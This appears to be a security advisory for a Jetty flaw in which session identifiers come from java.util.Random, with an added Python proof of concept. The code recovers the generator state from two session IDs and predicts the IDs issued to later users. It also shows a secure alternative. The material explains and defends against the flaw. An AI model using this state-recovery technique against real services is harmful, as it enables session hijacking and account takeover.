PT-2007-1248 · Eclipse · Jetty

Published 2007-02-07 · Updated 2022-05-01 · CVE-2006-6969

CVSS v2.0: 6.8 (Medium)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions

Jetty versions prior to 4.2.27
Jetty versions 5.1 prior to 5.1.12
Jetty versions 6.0 prior to 6.0.2
Jetty versions 6.1 prior to 6.1.0pre3

Description

Affected Jetty versions generate session identifiers with java.util.Random, which is not a cryptographically secure random number generator, so the identifiers it produces are predictable. A remote attacker can guess a valid session identifier by brute force, bypass authentication and possibly conduct cross-site request forgery attacks with the hijacked session.

Recommendations

For Jetty versions prior to 4.2.27, update to version 4.2.27 or later.
For Jetty versions 5.1 prior to 5.1.12, update to version 5.1.12 or later.
For Jetty versions 6.0 prior to 6.0.2, update to version 6.0.2 or later.
For Jetty versions 6.1 prior to 6.1.0pre3, update to version 6.1.0pre3 or later.
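Why java.util.Random is the wrong tool for session identifiers, as an added example that is not Jetty's code and not taken from this advisory: java.util.Random is a 48-bit linear congruential generator, and every next(32) call hands out the top 32 bits of its state, so an identifier built from one nextLong() leaves only 16 bits of state unknown. The Python below re-implements that generator bit-for-bit from the algorithm documented in the JDK, issues session identifiers in an assumed format (the 64 bits of one nextLong(), hex-encoded; the encoding Jetty actually used is not shown on this page), and, from two identifiers an attacker obtained for its own sessions, recovers the generator state and predicts the identifiers issued to the next users. The seed is constructed for the demonstration, and secure_session_id shows the hardened form, an OS-backed CSPRNG (the role java.security.SecureRandom plays in Java).

```python
import secrets

# Constants of the java.util.Random LCG, as documented in the JDK:
# state = (state * MULT + ADD) mod 2^48, next(bits) = state >>> (48 - bits)
MULT = 0x5DEECE66D
ADD = 0xB
MASK48 = (1 << 48) - 1
MASK64 = (1 << 64) - 1


def _signed32(v):
    return v - (1 << 32) if v >= (1 << 31) else v


def _signed64(v):
    v &= MASK64
    return v - (1 << 64) if v >= (1 << 63) else v


class JavaRandom:
    """Bit-exact re-implementation of java.util.Random's generator."""

    def __init__(self, seed):
        # Java scrambles the seed with the multiplier before use
        self.state = (seed ^ MULT) & MASK48

    @classmethod
    def from_state(cls, state):
        rng = cls(0)
        rng.state = state
        return rng

    def _next(self, bits):
        self.state = (self.state * MULT + ADD) & MASK48
        return self.state >> (48 - bits)

    def next_long(self):
        # Java: ((long) next(32) << 32) + next(32), both halves signed ints
        hi = _signed32(self._next(32))
        lo = _signed32(self._next(32))
        return _signed64((hi << 32) + lo)


def new_session_id(rng):
    """Weak session ID (assumed format): one nextLong() value, hex-encoded."""
    return format(rng.next_long() & MASK64, "016x")


def recover_state(id_a, id_b):
    """Recover the generator state from two consecutive session IDs.

    Each next(32) call leaks the high 32 bits of the 48-bit state, so only
    the low 16 bits are unknown: 65,536 candidates, filtered by the second
    half of id_a and then confirmed by re-deriving id_b.
    """
    u = int(id_a, 16)
    lo_u = u & 0xFFFFFFFF                          # second next(32), unsigned
    hi_u = ((u - _signed32(lo_u)) & MASK64) >> 32  # first next(32), unsigned
    for low16 in range(1 << 16):
        s1 = (hi_u << 16) | low16                  # state after first next(32)
        s2 = (s1 * MULT + ADD) & MASK48            # state after second next(32)
        if s2 >> 16 != lo_u:
            continue
        candidate = JavaRandom.from_state(s2)
        if new_session_id(candidate) == id_b:
            return candidate.state                 # state after id_b was issued
    return None


def predict_next_session_ids(id_a, id_b, count):
    """Attacker view: two of its own session IDs -> the next `count` IDs."""
    state = recover_state(id_a, id_b)
    if state is None:
        return None
    rng = JavaRandom.from_state(state)
    return [new_session_id(rng) for _ in range(count)]


def secure_session_id():
    """Hardened form: 128 bits from the OS CSPRNG (SecureRandom in Java)."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    server = JavaRandom(0x1234_5678_9ABC)          # constructed seed
    attacker_ids = [new_session_id(server) for _ in range(2)]
    victim_ids = [new_session_id(server) for _ in range(2)]
    print(predict_next_session_ids(*attacker_ids, 2) == victim_ids)
```

The brute force over 16 bits finishes in well under a second, which is the practical meaning of "predictable" here: the attacker does not need to guess 64-bit identifiers blindly, only to request a couple of sessions and replay the generator. The same recovery is impossible against secure_session_id, whose output carries no recoverable internal state.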

Weakness Enumeration

CWE-330: Use of Insufficiently Random Values

Related identifiers

CVE-2006-6969
GHSA-JG2X-R643-W2CH

Affected products

Jetty